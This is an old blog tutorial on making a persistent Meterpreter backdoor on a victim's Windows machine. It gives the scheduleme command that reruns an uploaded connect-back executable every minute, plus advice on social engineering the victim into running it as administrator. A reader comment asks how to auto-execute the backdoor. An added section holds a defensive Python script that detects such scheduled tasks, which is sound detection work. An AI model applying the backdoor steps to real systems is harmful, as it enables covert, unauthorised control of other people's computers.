Sunday 28 November 2010

HOW TO: Metasploit Meterpreter as a Backdoor

This tutorial is for making a backdoor on the victim's system which we can use to reconnect to them if we wish to.




For this we will be using the scheduleme command, but for it to work properly on Windows Vista and Windows 7 the victim would have to open the exe as administrator. This is easy to ensure if you apply the correct social engineering.
The meterpreter session will run under the user ID of the current user. Then use the "use privs" command to get better privileges and more options; typing "help" will then list most of the available commands for you to use.
The "use privs" command might have been taken out in the new versions of Metasploit; instead I think it loads it automatically. Just try it out, and I'll get back to you on this.

Using the scheduleme command
Running the command below will show you all the options available:

>"run scheduleme -h"

The command I use is below:
>"run scheduleme -m -1 -u -e /root/exploit.exe"

Break down the command:

The -m option specifies how often the scheduled task will run, so I did "-m -1" so it is started every 1 min.
The -u option gives the user name of the account with admin privs.
The -e option is the exe you want to upload to the victim and use as your backdoor. Mine is in the root directory, so -e /root/exploit.exe would be my option.

Now that it has been uploaded, exit the meterpreter session, start the listener again and wait a minute for a connection... watch the video!

NOTE: The EXE which is uploaded must obviously be configured to connect back to you, and you create this exe just like all the others.
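
On the defensive side, the technique above leaves a scheduled task on the host that relaunches an uploaded executable every minute. The following is an added example, not code from the original post, that reviews a Task Scheduler XML definition for that pattern. The trusted directory list, the 5-minute threshold and the sample task are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Assumption: directories where scheduled binaries are normally expected.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
MAX_REPEAT_SECONDS = 300  # assumption: repeats of 5 minutes or less deserve review

# Constructed sample task definition (XML declaration omitted so it parses as str).
SAMPLE_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT1M</Interval></Repetition>
    <StartBoundary>2010-11-28T12:00:00</StartBoundary>
  </TimeTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\Users\Public\updater.exe</Command></Exec></Actions>
</Task>"""

def interval_seconds(duration):
    """Convert an ISO 8601 duration such as PT1M or P1DT2H into seconds."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", duration.strip())
    if not m:
        return None
    d, h, mi, s = (int(x or 0) for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s

def review_task(xml_text):
    """Return a list of reasons why a task definition should be looked at."""
    root = ET.fromstring(xml_text)
    findings = []
    secs = [interval_seconds(e.text or "") for e in root.iterfind(".//t:Repetition/t:Interval", NS)]
    short = [s for s in secs if s is not None and 0 < s <= MAX_REPEAT_SECONDS]
    if short:
        findings.append(f"repeats every {min(short)}s")
    for cmd in root.iterfind(".//t:Actions/t:Exec/t:Command", NS):
        path = (cmd.text or "").strip().strip('"').lower()
        if path.endswith(".exe") and not path.startswith(TRUSTED_PREFIXES):
            findings.append(f"runs executable outside trusted directories: {cmd.text}")
    # Running as SYSTEM is normal for many tasks, so report it only as added context.
    users = [(u.text or "").strip().upper() for u in root.iterfind(".//t:Principal/t:UserId", NS)]
    if findings and any(u in ("S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM") for u in users):
        findings.append("runs as SYSTEM")
    return findings

if __name__ == "__main__":
    for reason in review_task(SAMPLE_TASK):
        print("REVIEW:", reason)
```

Task definitions stored on disk are UTF-16 files, so read them as bytes before passing them to `review_task`. Command paths that use environment variables are not expanded here.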

1 comment:

Derp D. said...

nice vid, but I got a question for you...

what you did was you created a backdoor first and then set up the listener, sent the backdoor to the victim, then ran it, and PWN :) ... anyways, my question is this: do you have any script for executing the backdoor automatically, because in your vid you manually run the backdoor...

hope you reply
chopzz
